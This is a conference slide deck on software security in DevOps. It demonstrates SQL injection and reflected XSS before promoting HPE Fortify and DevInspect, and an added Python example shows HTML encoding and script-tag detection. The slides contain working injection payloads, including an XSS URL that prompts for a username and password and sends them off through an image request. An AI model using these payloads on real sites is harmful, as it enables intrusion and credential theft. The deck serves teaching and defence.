Discover Best of Show 2016, 2-3 March 2016, Düsseldorf


Page 1: Discover Best of Show 2016 - Hewlett Packard Enterprise · 7 Ponemon Cost of Cyber Crime Study 2015 Ponemon Cost of Cyber Crime Study 2012. ... it costs 30x more than during design

Discover Best of Show 2016

2-3 March 2016, Düsseldorf

Page 2

Software Security in the Age of DevOps

Lucas von Stockhausen, Regional Product Manager Fortify

2-3 March 2016

Page 3

The case for Application Security

I am secure – I have a firewall

3

Page 4

Malware over the years

4

HPE Security Research, Cyber Risk Report 2016

Page 5

There is a breach in the headlines almost every day

5

http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Page 6

Aircraft Accidents over the years

6

[Chart: Aircraft Accidents. x-axis: Year; left y-axis: Accidents (0 to 140); right y-axis: Casualties (0 to 3000); series: Casualties, Accidents]

Number of accidents and fatalities per year (excluding sabotage, shoot-downs)

https://aviation-safety.net/statistics/period/

Page 7

The increase in attacks is constant

7

Ponemon Cost of Cyber Crime Study 2015

Ponemon Cost of Cyber Crime Study 2012

Page 8


Existing network and perimeter based security is insufficient

84% of breaches exploit vulnerabilities in the application layer

Yet the ratio of spending between perimeter security and application security is 23-to-1.

– Gartner Maverick Research: Stop Protecting Your Apps; It’s Time for Apps to Protect Themselves (2014)

Page 9

Basic hacking example

9

Page 10

Live example

– SQL Injection

– Telnet

– Cross site scripting

10

Page 11

SQL-Injection

String userName = ctx.getAuthenticatedUserName();
String itemName = request.getParameter("itemName");   // attacker-controlled request parameter
// Vulnerable: the parameter is concatenated straight into the SQL text
String query = "SELECT * FROM items WHERE owner = '"
    + userName + "' AND itemname = '" + itemName + "'";
ResultSet rs = stmt.executeQuery(query);

username = lucas
itemname = x' or 1=1; --

String userName = ctx.getAuthenticatedUserName();
String itemName = request.getParameter("itemName");
String query = "SELECT * FROM items WHERE owner = '"
    + "lucas" + "' AND itemname = '" + "x' or 1=1; --" + "'";
ResultSet rs = stmt.executeQuery(query);

SELECT * FROM items WHERE owner = 'lucas' AND itemname = 'x' or 1=1; -- '

The injected quote closes the itemname literal, "or 1=1" makes the WHERE clause true for every row regardless of owner, and "--" turns the application's closing quote into a comment, so the owner check is bypassed.

Page 12

SQL-Injection

12

Page 13

Telnet session

13

Page 14

XSS – Cross Site Scripting

14

Page 15

Real-world payloads

15

Page 16

Real-world payloads

– So, what is XSS truly capable of – What can you execute?

Page 17

Real-world payloads

– Simple answer:

– JavaScript

Page 18

Real-world payloads

– Simple answer:

– JavaScript

– Wait. That weak-sauce web scripting language that you had to learn in college back in the day?

– How bad could it be?

Page 19

Real-world payloads

– JavaScript is a full-featured programming language

– Object-oriented

– C-like syntax

– Extremely powerful

– Native in every browser

Page 20

Real-world payloads

– In sum, being able to run JavaScript on a victim’s browser has a LOT of potential

Page 21

Real-world payloads

– In sum, being able to run JavaScript on a victim’s browser has a LOT of potential

– Let’s take a look at a possible attack and how to build it up

– Let’s go to http://legacy.webapsecurity.com

Page 22

Real-world payloads

– http://legacy.webapsecurity.com

Page 23

Real-world payloads

– http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>

Page 24

Real-world payloads

– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); alert("username="%2B%0Ausername%2B%0A" and password="%2B%0Apassword);</script>

Page 25

Real-world payloads

– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write('<img src="http://localhost:8080/splc/images/top.jpg" alt=""'); document.write('<br>Invalid Login: '%2B%0Ausername);</script>

Page 26

Real-world payloads

– http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write('<img src="http://localhost:8080/splc/listMyItems.do?username='%2Busername%2B'%26password='%2Bpassword%2B'">'); document.write('<br>Invalid Login: '%2Busername);</script>
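The err parameter on these banklogin.asp slides becomes script only because the page writes it into its HTML unencoded. This added example (not from the deck or the demo site) reconstructs that reflection sink in Python, shows the contextual HTML-encoding fix, and runs a parser-based check a unit test or review script can use to detect a reflected script element; the render functions are hypothetical stand-ins for the page's template, and only the first demo URL from the slides is used as input.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlsplit

# Constructed sample: the first demo URL from the slides; the err query
# parameter carries the script that the login page reflects into its HTML.
DEMO_URL = 'http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>'


def err_param(url: str) -> str:
    """Extract and percent-decode the err query parameter the page echoes back."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "err":
            return unquote_plus(value)
    return ""


def render_error_vulnerable(err: str) -> str:
    """Hypothetical stand-in for the demo page: err is reflected verbatim,
    so a <script> element inside the value is parsed as markup."""
    return '<p class="error">' + err + "</p>"


def render_error_safe(err: str) -> str:
    """Hardened version: HTML-encode for the element-content context.
    '<', '>', '&' and quotes become character references, so the browser
    shows the payload as text and never executes it."""
    return '<p class="error">' + html.escape(err, quote=True) + "</p>"


class ScriptTagCounter(HTMLParser):
    """Counts <script> start tags the way a browser's tokenizer sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1


def count_script_tags(fragment: str) -> int:
    """Detection check: how many real <script> elements does the rendered
    fragment contain? Zero is the expected result for the safe renderer."""
    parser = ScriptTagCounter()
    parser.feed(fragment)
    parser.close()
    return parser.script_tags


if __name__ == "__main__":
    err = err_param(DEMO_URL)
    print("reflected   :", count_script_tags(render_error_vulnerable(err)), "script tag(s)")
    print("html-encoded:", count_script_tags(render_error_safe(err)), "script tag(s)")
```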

Page 27

Real-world payloads

– There are many other possibilities and opportunities

– Remember, if these are the easy options, imagine what others are capable of!

Page 28

Real-world payloads

– There are a number of ways to launch the actual attack

– Stored XSS

– Reflected XSS

– Owning a page that a victim visits

– Remember, navigating to a page is permission to run what’s on that page

– Consider that visiting a webpage is an act of significant trust

Page 29

What is the reason?

29

Page 30

Today’s approach > expensive, reactive

1. Somebody builds insecure software

2. IT deploys the insecure software

3. We are breached or pay someone to tell us our code is insecure

4. We convince & pay the developer to fix it

Page 31

Why it doesn’t work: 30x more costly to secure in production

– After an application is released into Production, it costs 30x more than during design.

[Chart: Cost (y-axis ticks 2X, 5X, 10X, 15X, 30X) by development phase (x-axis: Requirements, Coding, Integration/component testing, System testing, Production)]

Source: NIST

Page 32

This is application security

The right approach > systematic, proactive

In-house | Outsourced | Commercial | Open source

1. Embed security into SDLC development process

2. Leverage Security Gate to validate resiliency of internal or external code before Production

3. Monitor and protect software running in Production

Improve SDLC policies

Page 33

The help

Static Application Security Testing (SAST)

Dynamic Application Security Testing (DAST)

Interactive Application Security Testing (IAST)

Runtime Application Self Protection (RASP)

Page 34

Example Process for Analysis

[Process diagram. Swimlanes: Security Team, Development Teams. Roles: CISO, Project Security Lead, Security Auditor, Development Manager, Developer. Tools: AWB, IDE, Build Tool, Fortify SSC Server, Fortify SCA, Fortify CM, WebInspect, Source Code Repository(s), Central Build Server(s), Defect Tracking System, CM. Steps: 1. Identify, 2. Audit, 3. Assign, 4. Fix, 5. Validate, 6. Report; Monitor]

Page 35

Movement to DevOps

35

• Business leaders have “Agility” at the top of their priorities as they prepare for the fast-paced, very competitive future.

• Processes need to be further streamlined to minimize resource consumption and reduce time-to-market.

Security context

• Development organizations can save time and money by building in security early in the development process

Page 36

Challenges in a DevOps environment

36

• Developers are not security experts

• Security testing is an afterthought

• Pressure to push out software into production leaves no time for security

• Security assessments take up resources

Page 37

Introducing HPE Security DevInspect

37

Bringing application security closer to the Developer

• AppSec solution created for developers to identify and remediate security vulnerabilities in source code within the developer's native environment.

• Brings market-leading AppSec technologies directly to the developer, ensuring secure code as you “shift left” in your dev process.

• Real-time, instant security results as the developer is writing code.

• Enables developers to assess for security weaknesses.

Page 38

End to End Application Security

38

[Portfolio matrix: delivery model (On-premise, On-demand) by analysis type (Static, Dynamic, Runtime, Application Development). Products named: Fortify on Demand, App Defender, DevInspect]

Page 39

HPE Security DevInspect:

39

• Static Code Analysis

  – Real-time lightweight analysis of the source code

• Dynamic Analysis

• Runtime Analysis

• Documentation

Page 40

What’s included in DevInspect 1.0?

40

• Static Code Analysis

  – Real-time lightweight analysis of the source code

• Integration for Fortify Software Security Center (SSC)

• Integration for Fortify on Demand (FoD)

• Documentation

Page 41

Key Benefits

41

DESIGNED FOR THE DEVELOPER

• Fully integrated into the native development environment (IDE)

• Supports the DevOps toolchain

• Provides thorough and robust software security analysis of an application

INSTANT RESULTS (Fast)

• Inline analysis of the source code as the developer types providing immediate feedback

• Out of the box results – no configuration required

CONTINUOUS FEEDBACK

• Continuously updated security findings as code is written

• Tracks findings and guides developers toward remediation

Page 42

Example Process for Static Analysis in DevOps

[Process diagram. Swimlanes: Security Team, Development Teams. Roles: CISO, Project Security Lead, Security Auditor, Development Manager, Developer. Tools: AWB, IDE, Build Tool, Fortify SSC Server, Fortify SCA, Fortify CM, WebInspect, Source Code Repository(s), Central Build Server(s), Defect Tracking System, CM. Steps: 1. DevInspect, 2. Checkin, 3. Milestone Scan, 4. Validate, 5. Report; Monitor]

Page 43

Security Assistant: Real-time lightweight analysis of the source code

43

All issues detected in the project

Fortify icon added to the icon bar

Vulnerable line of code highlighted & tooltip for additional information

Detailed remediation advice

Fortify menu for additional options

Page 44

Thank you

[email protected]

44